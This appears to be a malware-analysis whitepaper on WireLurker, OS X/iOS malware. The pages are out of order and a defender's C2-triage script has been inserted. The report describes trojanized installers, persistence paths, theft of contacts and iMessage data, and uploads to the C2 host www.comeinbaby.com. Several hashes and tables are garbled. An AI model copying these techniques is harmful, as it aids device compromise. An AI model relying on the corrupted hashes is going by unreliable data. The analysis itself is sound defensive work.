WIRELURKER: - Palo Alto Networks
We wrote the following Python script to decrypt WireLurker version C communication data:

    #!/usr/bin/env python
    import base64
    import pyDes
    import sys

    original_data = sys.argv[1]
    # The first ten characters (a Unix timestamp) seed the key: their digit sum, as a
    # decimal string, followed by the fixed suffix "dksyel", forms the 8-byte DES key
    session_key = "%d" % sum([int(c) for c in original_data[:10]])
    key = session_key + "dksyel"
    # Everything after the ten-character prefix is the base64-encoded ciphertext
    encrypted_data = original_data[10:]
    des_cryptor = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
    plaintext = des_cryptor.decrypt(base64.b64decode(encrypted_data))
    print(plaintext)

PALO ALTO NETWORKS | WireLurker: Apple OS X and iOS malware | 14

Using the C2 communication captured in Figure 13, the following data was sent from the WireLurker C2 server to an infected OS X system over TCP:

14109439427UQZMzfWZHOIJCcSFVSE5xCOZVsy2fbV4 yehvSgxDHE COrxagqyvabtv9K 7uL8 T FmgjvLicVVYiyHKweloJT 7ts9bnl7ap934 VincBedikuN TgWizXCFL 72LXROAEfIPn1Hywb6Xur Tv6KKvToZG2w

Decryption by our script yields the following:

2257b9e685e89b8c7e11f554b05cdd6819a http://cos.myqcloud.com/1001584/ipa/7b9e685e689b8c7e11f554b05cda6819a

WireLurker version C uses a numeric CODE value to identify different kinds of data transmitted from client to server in C2 communications. We list all of these codes, mapped to their data associations, in the Appendix.

iOS Application Download

WireLurker version A does not download iOS applications; however, it reserves a folder in /usr/local/machook/ipa for this functionality. Versions B and C download IPA files to /usr/lo
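To make the decryption scheme usable from the defender's side, here is an added Python example (it is not the report's script and not Palo Alto Networks code) that recognises the version C framing in captured payloads and derives the per-message DES session key the report describes: a ten-digit prefix, its digit sum, and the fixed suffix dksyel. The regex, the helper names and the sample payloads are my own constructions, and the sample bodies are base64 of dummy bytes rather than real ciphertext. It also covers an edge case the report's script does not discuss: a prefix whose digit sum is below 10 yields a 7-byte key, which DES cannot use.

```python
"""Added example (not from the Palo Alto Networks report): triage captured
payloads for the WireLurker version C C2 framing and derive the DES session
key.  The framing rule (10-digit prefix, digit sum + "dksyel", base64 body)
is taken from the report's script; helper names and samples are my own."""
import base64
import binascii
import re

KEY_SUFFIX = "dksyel"   # constant suffix used by the report's script
PREFIX_LEN = 10         # leading digits (a Unix timestamp) per the report
DES_BLOCK = 8           # DES block and key size in bytes

# 10 digits followed by a base64 body (assumption: no whitespace inside a message)
_C2_RE = re.compile(r"^[0-9]{10}[A-Za-z0-9+/]+={0,2}$")


def derive_session_key(payload):
    """Digit sum of the 10-character prefix, as decimal text, plus 'dksyel'."""
    prefix = payload[:PREFIX_LEN]
    if len(prefix) != PREFIX_LEN or not prefix.isdigit():
        raise ValueError("payload does not start with a 10-digit prefix")
    return ("%d" % sum(int(c) for c in prefix)) + KEY_SUFFIX


def classify_payload(payload):
    """Describe whether `payload` fits the version C framing.

    Returns a dict with: matches (bool), key (str or None), key_ok (bool,
    True only when the derived key is exactly 8 bytes) and reason (str)."""
    payload = payload.strip()
    if not _C2_RE.match(payload):
        return {"matches": False, "key": None, "key_ok": False,
                "reason": "no 10-digit prefix followed by base64"}
    body = payload[PREFIX_LEN:]
    try:
        raw = base64.b64decode(body, validate=True)
    except (binascii.Error, ValueError):
        return {"matches": False, "key": None, "key_ok": False,
                "reason": "body is not valid base64"}
    if len(raw) == 0 or len(raw) % DES_BLOCK:
        return {"matches": False, "key": None, "key_ok": False,
                "reason": "decoded length %d is not a multiple of the DES block"
                          % len(raw)}
    key = derive_session_key(payload)
    # Edge case: a digit sum below 10 gives a 7-byte key, unusable for DES as
    # written in the report's script (pyDes would reject it).
    key_ok = len(key) == DES_BLOCK
    return {"matches": True, "key": key, "key_ok": key_ok,
            "reason": "framing matches; %d-byte key" % len(key)}


def decrypt_payload(payload):
    """Decrypt with pyDes (the library the report's script uses) if installed.

    Returns None when the framing or key does not fit; pyDes is imported lazily
    so classification works without it."""
    info = classify_payload(payload)
    if not info["matches"] or not info["key_ok"]:
        return None
    import pyDes  # third-party dependency, only needed for actual decryption
    des = pyDes.des(info["key"].encode(), pyDes.ECB, padmode=pyDes.PAD_PKCS5)
    return des.decrypt(base64.b64decode(payload.strip()[PREFIX_LEN:]))


def triage(lines):
    """Return (line, session_key) for every captured line matching the framing."""
    hits = []
    for line in lines:
        info = classify_payload(line)
        if info["matches"]:
            hits.append((line, info["key"]))
    return hits


# Constructed samples (NOT real ciphertext).  The prefix 1410943942 is the one
# shown in the report's capture; the bodies are base64 of dummy bytes.
SAMPLE_C2_LIKE = "1410943942" + base64.b64encode(bytes(16)).decode()
SAMPLE_HTTP = "GET /index.html HTTP/1.1"
SAMPLE_SHORT_KEY = "1000000000" + base64.b64encode(bytes(8)).decode()  # digit sum 1
SAMPLE_BAD_LEN = "1410943942" + base64.b64encode(b"abc").decode()      # 3 bytes

if __name__ == "__main__":
    for line, key in triage([SAMPLE_C2_LIKE, SAMPLE_HTTP,
                             SAMPLE_SHORT_KEY, SAMPLE_BAD_LEN]):
        print("candidate C2 payload, session key %s: %s..." % (key, line[:24]))
```

The classification step is deliberately independent of any crypto library: an analyst can run it over a pcap's reassembled TCP payloads to find candidate messages and their keys, and only then reach for pyDes to decrypt the ones worth looking at.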
(Continued from the previous page: the context column of the C2 URL table)
Checking for update (OS X)
Exfiltration of system information
Heartbeat
Check for app to download
Checking for update (iOS)
Exfiltration of user data
Check for app to download
Check for app to download
Check in for malware
Log application installation
Log application start
Report update error
Report update error

Version C Encrypted C2 Communication Codes

The following is a list of WireLurker version C customized encryption C2 communication codes mapped to data context:

CODE  Data Context
100   Hardware information for the connected iOS device
101   Enumeration of apps installed on the iOS device
102   Start of operations on an iOS device
103   No USB device found
104   An application was successfully installed on the iOS device
105   Whether an iOS device was paired with the OS X computer
106   Heartbeat packet
107   Hardware information of connected USB device
108   An iOS device was disconnected
200   Check for code update
201   Start send operation for the local log file
202   End send operation for the local log file
300   Check for iOS application to download
400   Code was run with root privileges
401   OS X user appears to be a developer
999   Current OS X system version

Palo Alto Networks, 4401 Great America Parkway, Santa Clara, CA 95054 | Main +1 408 753 4000 | Sales +1 866 320 4788 | Support +1 866 898 9087 | www.paloaltonetworks.com
WIRELURKER: A New Era in iOS and OS X Malware
Report by Claud Xiao, Unit 42
Palo Alto Networks, 4401 Great America Parkway, Santa Clara, CA 95054, www.paloaltonetworks.com

TABLE OF CONTENTS
Executive Summary 3
Background 4
  User Reporting for this Threat 4
  Investigation of the Third Party App Store 5
WireLurker Workflow and Malware Progression 6
WireLurker Versions 7
Analysis of WireLurker OS X Malware 9
  Bundle Repackaging and File Hiding 9
  Self Update 11
  Persistence Mechanisms 13
  C2 Server Communication 14
  iOS Application Download 15
  USB Connection Monitoring 17
  Exfiltration of Device Information 17
  Installation of Malicious Dynamic Library to an iOS Device 18
  Backup of Specific Installed Applications from an iOS Device 19
  Trojanizing iOS Applications 20
  Installation of Trojanized iOS Applications 20
Analysis of WireLurker iOS Malware 22
  Code Injection into System Applications 22
  Self Update 23
  Exfiltration of User Data 24
  Exfiltration of Application Usage and Device Serial Number Information 25
Overall Threat Analysis 26
  Use of Repackaging to Trojanize Applications 26
  Malicious Use of USB Connections 26
  Attacks Against Jailbroken Devices 26
  Attacks Against Non-Jailbroken Devices 26
  Actor Motivation 27
Prevention, Detection, Containment and Remediation 27
  Prevention 27
  Detection and Containment 28
  Remediation 29
Acknowledgements 29
Appendix 30
  SHA-1 Hashes of WireLurker Related Files 30
  URLs for
FIGURE 1: Report of strange apps appearing on a non-jailbroken iPhone

Nine days later, a thread was created on a Chinese developer forum by the user LeoHe describing anomalous findings on his iPhone. A similar thread was created on a Chinese Apple fan forum on August 9, 2014. In these forum threads, numerous users reported the installation of strange applications and the creation of enterprise provisioning profiles on their non-jailbroken iPhones and iPads (Figure 2).

[FIGURE 2: Additional developer forum discussion regarding anomalous findings (screenshot of a Chinese-language forum thread; the post text is not legible in this copy)]

They also mentioned launch daemons found on their Mac computers with names like machook_damon and WatchProc. Some of these same users stated that they recently downloaded and installed applications from the Maiyadi App Store (http://app.maiyadi.com), a third-party OS X and iOS application store in China. As background, the Maiyadi site is a Chinese portal for Apple-related news and resources. The Maiyadi App Store is a sub-site known to host pirated premium Mac, iPhone and iPad applications.

Investigation of the Third Party App Store

Some forum users specifically mentioned downloading a Mac application named CleanApp (Figure 3) from the Maiyadi App Store
wild. WireLurker is the second malware family known to employ this strategy. The notable difference between WireLurker and Mekie is that WireLurker also targets non-jailbroken iOS devices.

Attacks Against Jailbroken Devices

From a trending perspective, it is clear that attacks against jailbroken iOS devices will continue to increase. During 2014, six new iOS malware families targeting jailbroken devices were found, three of which by Palo Alto Networks:

• AdThief infected and replaced the Advertisement ID of 75,000 devices
• Unflod hijacked all iTunes traffic to steal Apple IDs
• Mekie acted as spyware and stole users' emails, SMS and other IM logs
• AppBuyer stole Apple IDs and bought apps in the background through emulated iTunes protocols
• Xsser is a RAT spreading broadly in Hong Kong
• WireLurker, the subject of this whitepaper

There are common characteristics across these malware families (except for Mekie), including:

• They all targeted jailbroken devices
• They all used the Cydia Substrate framework or were hosted in some third-party Cydia repositories
• They all originated from China and mainly targeted Chinese users

Attacks Against Non-Jailbroken Devices

Historically, only two malware/adware families have been confirmed as successfully installed onto non-jailbroken iOS devices: the LBTM adware in September 2010 and the FindAndCall worm in July 2012. Since Apple removed them from the official App Store immed
an OS X system (Figure 11).

[FIGURE 11: Files dropped by the obfuscated update binary (screenshot of the file listing; the dropped files, their MD5-named sources and their paths are given in Table 3)]

Table 3 maps each of these malicious files to their corresponding drop path. Of significant note, dea26a823839b1b3a810d5e731d76aa2 (/usr/bin/stty5.11.pl) is a Mach-O universal binary executable file for ARMv7 and ARMv7s architectures. The dff52d100c8d69f053670a70712b
an application named "FA 88h User Manual in English".

[FIGURE 4: Installation interface of WireLurker-infected applications]

These trojanized applications were hosted on two cloud storage websites, Huawei and Baidu, instead of on Maiyadi's servers.

WireLurker Workflow and Malware Progression

This section summarizes WireLurker's workflow and malware progression (Figure 5), which are described in further detail in subsequent sections.

[FIGURE 5: WireLurker's workflow and malware progression. Steps shown in the diagram: Trojanize Mac Application; Upload to 3rd Party App Store; User Downloads & Runs Mac App; Mac App Drops & Installs Files; Check for Updates; Communicate with C2 Server; Download iOS Apps; Monitor USB for iOS Connections; Download New Code; Backup Specific iOS Apps; Exfiltrate Device Information; iOS Device Infection; Trojanize iOS Apps; Exfiltrate User Data]

WireLurker was used to trojanize pirated Mac applications that were uploaded to the Maiyadi App Store. Victims downloaded these applications, installed them on their OS X systems and ran them. On instantiation, WireLurker's entry code was transparently executed, dropping malicious executable files, dynamic libraries and configuration files prior to running the original pirated application; some of these executable files were loaded by the operating system as launch daemons. One launch daemon manages connec
[FIGURE 30: Restoring the original bundle executable file (decompiled Objective-C: builds an "mv" command line with NSString stringWithFormat: and runs it through system())]

The exfiltration of this information is most likely used by the attacker for tracking WireLurker infections.

Overall Threat Analysis

Use of Repackaging to Trojanize Applications

WireLurker trojanized OS X and iOS applications using repackaging through executable file replacement. This technique is both simple to implement and effective. We expect to see more OS X and iOS malware employing it in the future, similar to the respective increase in malicious APK repackaging by Android malware authors.

Malicious Use of USB Connections

Proofs of concept for attacking non-jailbroken iOS devices over USB connections have been available for some time now. In May of 2013, Mathieu Renard described how to use a malicious USB accessory to install applications to iOS devices during a presentation at Hackito Ergo Sum. At Black Hat 2013, Billy Lau and others demonstrated a very similar attack using malicious device chargers. However, it wasn't until June 24, 2014 that Kaspersky Lab found an iOS version of the Mekie spyware using this technique on Windows and OS X computers in the
strange applications found on the device. For jailbroken devices, we recommend that you check whether the file /Library/MobileSubstrate/DynamicLibraries/sfbase.dylib exists. If so, you should delete it through a terminal connection via an application like Mobile Terminal or Secure Shell (SSH).

Acknowledgements

We would like to thank CDSO from the WeiPhone Technical Group for forwarding user reports to us, QU Chao from Tencent Inc. for providing samples of WireLurker version B, and Hui Gao, Xin Ouyang, Zhi Xu and Jin Chen of Palo Alto Networks for making sure our customers are well protected by our products. We would also like to thank Rob Downs and Ryan Olson of Palo Alto Networks for their great effort on improving this report's accuracy, fluency and quality. Their work helps all of us to understand the threat more clearly.

Appendix

SHA-1 Hashes of WireLurker Related Files

The following are the SHA-1 values of malicious files across the WireLurker lifecycle.

Original Files Used to Trojanize
Filename          SHA-1
<variable name>   e2b9578780ae318dbdb949aac32a 7dde 6c d918
<variable name>   bb8cbc2ab928d66fa1f17e02f112634ad38a477d6
start.sh          42ad4311f5e7e520a40186809aad981f78c0cf05
FontMap1.cfg      1130ef7a16482805ab37785ae1e66408bd482120

Downloaded Updates
Filename          SHA-1
update.zip        eab02ab858e84c9b61caff92d88ff007ffe930e
start.sh          ddb152c140ebff b755b2822875c688ce
the attacker to collect significant amounts of information from a large number of Chinese iOS and Mac OS systems, but none of the information points to a specific motive. As infected devices regularly request updates from the attacker's command and control server, new features or applications could be installed at any time. It's clear the tool set is still undergoing active development, and we believe WireLurker has not yet revealed its full functionality.

Prevention, Detection, Containment and Remediation

Prevention

The following are our recommendations to enterprises and users regarding prevention or mitigation of WireLurker or similar OS X or iOS malware threats:

• Enterprises should assure their mobile device traffic is routed through a threat prevention system using a mobile security application like GlobalProtect
• Employ an antivirus or security protection product for the Mac OS X system and keep its signatures up to date
• In the OS X System Preferences panel under "Security & Privacy", ensure "Allow apps downloaded from" is set to "Mac App Store" or "Mac App Store and identified developers"
• Do not download and run Mac applications or games from any third-party app store, download site or other untrusted source
• Keep the iOS version on your device up to date
• Do not accept any unknown enterprise provisioning profile unless an authorized, trusted party (e.g. your IT corporate help desk) explicitly instructs you to do so
[FIGURE 21: Applications that WireLurker looks for on an iOS device (decompiled code calling BackupApp for com.alipay.iphoneclient and com.meitu.mtxx)]

WireLurker's code also revealed an unfinished stub looking for the com.tencent.mqq application, which is the client app of the popular IM service QQ produced by Tencent. We anticipate the inclusion of checks for this application in future versions of WireLurker.

Trojanizing iOS Applications

WireLurker passes the device's jailbroken status to a function named InstallApp, which installs downloaded IPAs or re-installs trojanized versions of the specific applications mentioned previously.

[FIGURE 22: WireLurker infection of iOS applications (decompiled code: zip_name_locate on the bundle's executable, fopen of /usr/bin/stty5.11.pl as the replacement source, zip_file_add and zip_close; failures are logged through Utils::LogFile)]

If the device is jailbroken, InstallApp will trojanize an iOS app
0853 file is a ZIP archive that is decompressed to /etc/manpath.d/. The resulting /etc/manpath.d/libiodb.dylib is also an ARMv7 and ARMv7s executable file. These two ARM executable files are used for subsequent repackaging of iOS applications that are then installed on iOS devices.

FILENAME                                  DROP PATH
94a933c449948514a3ce634663f9ccf8          /System/Library/LaunchDaemons/com.apple.appstore.plughelper.plist
e6e6a7845b4e00806da7d5e264eed72b          /System/Library/LaunchDaemons/com.apple.MailServiceAgentHelper.plist
fd7b1215f03ed1221065ee4508d41de3          /System/Library/LaunchDaemons/com.apple.systemkeychain-helper.plist
bda470f4568dae8cb12344a346a181d9          /System/Library/LaunchDaemons/com.apple.periodic-dd-mm-yy.plist
dca13b4ff64bcd6876c13bbb4a22f450          /usr/bin/com.apple.MailServiceAgentHelper
aa fe189baa35ba be aafac1e765f41          /usr/bin/periodicdate
e03402006332a6e17c36e5691784d2097         /usr/bin/systemkeychain-helper
c4264b9607a68de8b9bbbe3043615f28          /usr/bin/com.apple.appstore.PluginHelper
dea26a823839b1b3a810d5e731d76aa2          /usr/bin/stty5.11.pl
dff52d100c8d69f053670a70712b0853          Unzipped to /etc/manpath.d/
TABLE 3: Drop paths for appended ZIP archive files from the update binary

Persistence Mechanisms

WireLurker remains running as a background process, waiting for iOS devices to infect over USB connections. Multiple methods and redundancy are used to achieve this goal:

• Every time a user runs a WireLurker-trojanized application, the loader executes malicious code in th
3619e75
update                              03c8dd6ea2a940da347e25f4de8724b4e8c48842

Dropped Files (version A)
Filename                            SHA-1
machook                             7adb66f1043a7378d418d51a415818373a5d3b67
watch.sh                            bacc91lae4856f4f52c82f1dd1be41c85ef5f1f0
globalupdate                        0396176f3a9bfc8c2b8ddc979d723f19a77116388
com.apple.globalupdate.plist        1e9bc3259a514bcce39bac895f46c04cb122677b
com.apple.machook_damon.plist       9065133025d834a3e2f5ca3b2142a47526d7418f
sfbase.dylib                        461b51dd595c07f3c82be7cffc1cc77da6700605

Dropped Files (version B)
Filename                            SHA-1
machook                             4cO4ccd 6bf al edb7b94f9320f80289d 1097829
itunesupdate                        f573add40eea190931 2a438fc51cd45569cb94ab
globalupdate                        0396176f3a9bfc8c2b8ddc979d723f9a77F1 6388
WatchProc                           8f57cef045ed370d210d3fce2c0d261bd83c5167
com.apple.machook_damon.plist       9065133025d834a3e2f5ca3b2142a47526d7418f
com.apple.itunesupdate.plist        32cf3ead21079ed98ae50c7875d1e91e76ebb5cf
com.apple.globalupdate.plist        1e9bc3259a514bcce39bac895f46c04cb122677b
com.apple.watchproc.plist           1bc0b3961454b80b8b39198b605403366bfb0621
start                               0134bb87585a448caafe51218746e070f3b 17272

Dropped Files (version C)
Filename
periodicdate
systemkeychain-helper
com.apple.MailServiceAgentHelper
com.apple.appstore.PluginHelper
com.apple.periodic-dd-mm-yy.plist
com.apple.systemkeychain-helper.plist
com.apple.MailServiceAgentHelper.plist
com.apple.appstore.plughelper.plist
stty5.11.pl
libiodb.dylib
com.apple.Finde

Malicious iOS Exec
  C2 Communication 31
  Version C Encrypted C2 Communication Codes 32

Executive Summary

Palo Alto Networks recently discovered a new family of Apple OS X and iOS malware, which we have named WireLurker. We believe that this malware family heralds a new era in malware across Apple's desktop and mobile platforms, based on the following characteristics:

• Of known malware families distributed through trojanized/repackaged OS X applications, the biggest in scale we have ever seen
• Only the second known malware family that attacks iOS devices through OS X via USB
• First malware to automate generation of malicious iOS applications through binary file replacement
• First known malware that can infect installed iOS applications similar to a traditional virus
• First in-the-wild malware to install third-party applications on non-jailbroken iOS devices through enterprise provisioning

WireLurker was used to trojanize 467 OS X applications on the Maiyadi App Store, a third-party Mac application store in China. In the past six months, these 467 infected applications were downloaded over 356,104 times and may have impacted hundreds of thousands of users. WireLurker monitors any iOS device connected via USB with an infected OS X computer and installs downloaded third-party applications or automatically generated malicious applications onto the device, regardless of whether it is jailbroken. This is the reason we call it "wire lurker". Researchers hav
C2 server. Educated guesses based on URL structure revealed two earlier versions of sfbase.dylib still hosted on the C2 server: 4.0.0 and 4.0.1. Based on these version numbers, we speculate that there may be as many as three other major version releases of sfbase.dylib used in prior attacks.

Version   File Size (bytes)   SHA-1 Value
4.0.0     290,492             f097eb7af4ea7783713adf01e5483b0d89375be8
4.0.1     296,208             2a40a5e0b350264195f858e291678c290e4a18c4
4.0.2     296,288             461b51dd595c07f3c82be7cffc1cc77da6700605
TABLE 5: Different versions of sfbase.dylib

Exfiltration of User Data

In addition to hooking system APIs, the sfbase.dylib dynamic library also steals user data and uploads it to the C2 server. Specifically, it copies the file /User/Library/AddressBook/AddressBook.sqlitedb into the /tmp directory using root privileges (Figure 27), then executes the following SQLite query:

select m.value, p.first, p.last from ABMultiValue m, ABPerson p where m.record_id = p.ROWID

[FIGURE 27 (continues on the next page): decompiled code that copies /User/Library/AddressBook/AddressBook.sqlitedb to /tmp/AddressBook.sqlitedb with "cp -rf" after calling setuid and setgid]
[FIGURE 24: Initialization code of the sfbase.dylib iOS dynamic library (decompiled: compares the host executable name against lists containing Preferences, Search and MobileStorageMounter, calls mydUtils CheckUpdate and getLoaclInfo, and hooks UIWindow sendEvent: through MSHookMessageEx with replace_UIWindow_sendEvent)]

This dynamic library adds a notification observer within its sendEvent hook for a user pressing the home button. On detection of this event, it kills all Phone, Messages and Safari processes in the background using root privileges. This piece of hooking code is most likely still under development since, at the time of this whitepaper's publication, we found unfinished methods like mydUIWebViewHook hook webView:didFinishLoadForFrame: and mydWebView webView:shouldStartLoadWithRequest:navigationType:, which attempt to hook the WebView library for loading URLs in the background without the user's knowledge (Figure 25).
[FIGURE 17: WireLurker callback function registration to monitor USB connections]

Every time an iOS device connects to or disconnects from a WireLurker-infected computer, the above callback is invoked. For connections, the function fetches the iOS device's Unique Device Identification Number (UDID) and then calls OperatDevice(char const*), which allows a number of iOS device operations, including:

• Collection and transmission of device information to the C2 server
• Installation of malicious dynamic libraries (Substrate tweak) to a jailbroken device
• Backup of specific installed applications from a device
• Repackaging of downloaded or backed-up applications to include a malicious ARM executable file
• Installation of repackaged applications to a jailbroken device, or downloaded applications to a non-jailbroken device

Exfiltration of Device Information

WireLurker uses the libimobiledevice library interfaces to access the lockdown service on an iOS device over USB and collect the following device information (Figure 18):

• Serial number
• Phone number
• Model number
• Device type and version name
• User's Apple ID
• UDID
• Wi-Fi address
• Disk usage information

[FIGURE 18: Collection of device information over lockdownd (assembly calling getdeviceinfo(lockdownd_client_private*, char const*) once per key, e.g. PhoneNumber)]
Most update operations are accomplished through the update binary. This file has a Mach-O executable file header; however, a ZIP archive is appended to it (Figure 10). The ZIP archive includes another 10 files, with their MD5 hash values used for the corresponding filenames.

[FIGURE 10: Exploring the WireLurker version C update binary. Terminal session: "file update" reports a Mach-O 64-bit x86_64 executable; "dd if=update of=update_tail bs=1 skip=..." copies the appended bytes; "file update_tail" reports "Zip archive data, at least v2.0 to extract"; "unzip -l update_tail" lists ten members whose names are the MD5 hashes given in Table 3]

The 64-bit code of the update binary is highly obfuscated. Dynamic analysis reveals that it extracts the appended ZIP package, decompresses it and moves the ten enclosed files to specified paths on
[FIGURE 20: Installation of malicious MobileSubstrate tweak to a jailbroken iOS device (assembly calling afc_upload_files(afc_client_private*, char const*) with the path /Library/MobileSubstrate/DynamicLibraries)]

Backup of Specific Installed Applications from an iOS Device

The libimobiledevice library also provides interfaces to two standard Apple services available on every iOS device: AFC and com.apple.mobile.installation_proxy. Using these interfaces, WireLurker attempts to determine whether certain applications are already installed on the device. If they are, it performs a backup of their IPA bundle files through the two Apple services, equivalent to a normal application backup using iTunes. Backed-up IPA bundle files are subsequently stored in the /usr/local/machook/ipa folder, and log-related information is written to a local SQLite database. The list of hardcoded iOS applications that WireLurker looks for follows (Figure 21):

• com.meitu.mtxx: a photo modification app produced by Meitu
• com.taobao.taobao4iphone: the official client app of Taobao (like eBay in China), produced by Alibaba
• com.alipay.iphoneclient: the official client app of Alipay (like PayPal in China), produced by Alibaba

[FIGURE 21 (continues on the next page): decompiled checks that call BackupApp for com.taobao.taobao4iphone]
• Do not pair your iOS device with untrusted or unknown computers or devices
• Avoid powering your iOS device through chargers from untrusted or unknown sources
• Similarly, avoid connecting iOS devices with untrusted or unknown accessories or computers (Mac or PC)
• Do not jailbreak your iOS device. If you do jailbreak it, only use credible Cydia community sources and avoid the use or storage of sensitive personal information on that device

Detection and Containment

From May 21, 2014 through September 28, 2014, five different WireLurker files representing three different versions were submitted to VirusTotal; however, none of the 55 threat detection engines employed by VirusTotal identified this threat (Figure 31). Our hope is that this report will contribute to improved detection rates.

[FIGURE 31: VirusTotal threat detection engines did not flag WireLurker as malware. Legible details: SHA256 93856f704db2efe2e2262e6c7 10a23d03d6b0748c02e4d5dBd2d4e25f56aBb32 (as printed), file name machook, detection ratio 0/55, analysis date 2014-09-28 14:20:16 UTC]

In terms of network-based detection, Palo Alto Networks released two signatures (13748, 13749) to detect all WireLurker C2 communication traffic. When our customers receive an alert fo
[FIGURE 27: Code showing sfbase.dylib capturing iOS contacts information (decompiled: opens /tmp/AddressBook.sqlitedb with FMDatabase databaseWithPath: and runs the contacts query)]

It also copies the file /User/Library/SMS/sms.db into the /tmp directory using root privileges and executes the following SQLite query to capture iMessage chats:

select distinct chat_identifier from chat where service_name = 'iMessage'

This query returns all of the iMessage IDs the user has communicated with from the database. After executing the above SQLite queries, sfbase.dylib deletes those temporary database copies, saves the results to a local file, and exfiltrates that file and Apple ID information to the C2 server www.comeinbaby.com (Figure 28).

[FIGURE 28 (continues on the next page): decompiled code building an HTTP POST to www.comeinbaby.com at /app/saveinfo.php, attaching the results file under the form key "text"]
[FIGURE 28: Exfiltration of iOS user data to the C2 server (decompiled: multipart/form-data POST to www.comeinbaby.com with headers Connection: Keep-Alive and Charset: UTF-8)]

Exfiltration of Application Usage and Device Serial Number Information

WireLurker repackages iOS applications with an ARM executable file named start or stty5.11.pl, depending on version. This binary is a loader that collects the current application's name and the device's serial number, exfiltrates this information to the C2 server (Figure 29), restarts the SpringBoard and restores the original bundle executable file (Figure 30).

[FIGURE 29: Exfiltration of application and serial number information (decompiled: reads the serial number, formats a request URL containing the bundle executable name and the serial number as the sn parameter, and calls sendRequestTo)]

[FIGURE 30 (continues on the next page): the loader kills SpringBoard with SIGHUP before restoring the original executable]
ader and the original bundle executable. After dropping the above script, the loader determines whether this is the first time it has been run by looking for the /usr/local/machook/machook file. If that file doesn't exist, it performs the following actions:

• Copies the Resources/start.sh and Resources/FontMap1.cfg files to the /Users/Shared folder on the Mac
• Requests system administrator privileges
• Executes /Users/Shared/start.sh with administrator privileges

The start.sh script:

• Decompresses the FontMap1.cfg ZIP archive to a new folder, /usr/local/machook
• Copies the decompressed com.apple.machook_damon.plist and com.apple.globalupdate.plist files to the /Library/LaunchDaemons folder to register them as system launch daemons
• Launches these two daemons using the launchctl command
• Copies a decompressed globalupdate file to the /usr/bin folder

Then the loader collects the hardware serial number for the Mac and uploads it to the C2 server www.comeinbaby.com (Figure 8).

[FIGURE 8: Packet capture of the serial number upload. Legible fields: Frame 23, 253 bytes on wire (2024 bits); Ethernet II Src Parallel_5c:ab:55 (00:1c:42:5c:ab:55), Dst Parallel_00:00:18 (00:1c:42:00:00:18); TCP Src Port 50645, Dst Port http (80), Seq 1, Ack 1, Len 199; User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8y zlib/1.2.5; Host: www]
and suspected it might be a culprit.

[FIGURE 3: One of the applications in the Maiyadi App Store infected with WireLurker (screenshot of the CleanApp for Mac listing: version 4.0.8, 34.96 MB, dated 2014-05-30, for OS X 10.7.5)]

In fact, our investigation revealed that almost all of the Mac applications (totaling 467) uploaded to the Maiyadi App Store from April 30, 2014 to June 11, 2014 were trojanized (repackaged) with WireLurker. These impacted applications were downloaded 356,104 times as of October 16, 2014. Table 1 lists the top 10 WireLurker applications ordered by number of downloads.

WIRELURKER-INFECTED APPLICATION              NUMBER OF DOWNLOADS
The Sims 3                                   42,110
International Snooker 2012                   22 9S (as printed)
Pro Evolution Soccer 2014                    20,800
Bejeweled 3                                  19,016
Angry Birds                                  14,009
Spider 3                                     1278 (as printed)
NBA 2K13                                     113 (as printed)
GRID                                         107820 (as printed)
Battlefield: Bad Company 2                   9,065
Two Worlds II Game of the Year Edition       6,451
TABLE 1: Top 10 WireLurker downloads from the Maiyadi App Store as of Oct 10, 2014

All of the WireLurker-trojanized applications included an installation interface that used Pirates of the Caribbean-themed wallpaper (Figure 4). A ZEE seal and QQ account number were also displayed, both of which correspond to the owner of the Maiyadi site. Another similarity between these installers was that their packages always contained
app store client
Malicious iOS executables   New feature                  Path changed and content slightly changed
Malicious iOS dylibs        No changes                   Path and filename changes

Table 2 shows how these categories of files changed between versions. The filenames and SHA-1 hashes for all associated files can be found in the Appendix of this whitepaper.

Analysis of WireLurker OS X Malware

Bundle Repackaging and File Hiding

Every OS X application is comprised of a bundle that contains an executable as its main entry. WireLurker trojanizes OS X applications using three files: a loader, a shell script and a ZIP archive. The first step WireLurker takes is to append an underscore to the original bundle executable name and then copy its malicious loader into the bundle to replace the original executable. As an example, given an OS X bundle with an executable named Contents/MacOS/CleanApp, WireLurker would move the original file to Contents/MacOS/CleanApp_ and then copy the malicious loader to Contents/MacOS/CleanApp. After executable replacement, WireLurker then adds a shell script (start.sh) and a ZIP archive (FontMap1.cfg) to the Contents/Resources folder of the bundle. The hidden flag is then set for these four files. This flag is an Apple-specified file property defined in /usr/include/sys/stat.h as UF_HIDDEN. With this flag set, a standard user won't see the files in the Fin
cal/ipcc and /usr/share/tokenizer/Ja, respectively, and store download history in local SQLite3 databases. Analysis revealed that WireLurker version B downloaded two applications, lszr2 and pphelper. The lszr2 application is an iOS game developed by a Chinese company, and the pphelper application is a third-party iOS App Store client. WireLurker version C downloaded one application, 7b9e685e89b8c7e111554b05cdd6819a, a comic reader. Filenames, display names, executable names and bundle identifiers for these applications are summarized in Table 4.

File Name                           Display Name      Executable Name   Bundle Identifier
lszr2                               amp L tz y 2      lszr2             yueyu com737lszr2 yueyu
pphelper                            PPHIISF 1E hk     PPAppInstall      qudaobao com gzteiron pphelper share
7b9e685e89b8c7e11f554b05cdd6819a    Ble manhua        manhua            com.manhuaba.manhuajb
TABLE 4: iOS applications downloaded by WireLurker

Of note, all IPA-format iOS applications downloaded by WireLurker contain an embedded mobileprovision file in their bundle. The ProvisionsAllDevices key value within these provisioning files is set to true (Figure 14), which means these files are categorized as enterprise provisioning and that the applications are signed by enterprise certificates.

[Figure 14, embedded provisioning profile: Name com.manhuaba.manhuajb; ProvisionsAllDevices; TeamIdentifier; TeamName Hunan Langxiong Advertising Decoration Engineering Co., Ltd.]
FIGURE 14: WireLurker-downloaded applications leverage enterprise p
comeinbaby.com; Accept: */*; HTTP request to http://www.comeinbaby.com carrying an appid parameter and the serial number, followed by the HTTP/1.1 response]
FIGURE 8: WireLurker uploading the hardware serial number for an OS X victim machine

Self-Update

In WireLurker version A, the dropped globalupdate file will be executed as a launch daemon and periodically check its C2 server for a new version using the following GET request:

http://www.comeinbaby.com/mac/getversion.php?sn=<HardwareSerialNumber>

A packet capture of this communication is shown in Figure 9.

[Figure 9, packet capture (begins)]
GET /mac/getversion.php?sn=C02JRH8WDKQ1 HTTP/1.1
Host: www.comeinbaby.com
User-Agent: globalupdate (unknown version) CFNetwork/596.5 Darwin/12.5.0 (x86_64) (MacBookPro10%2C1)
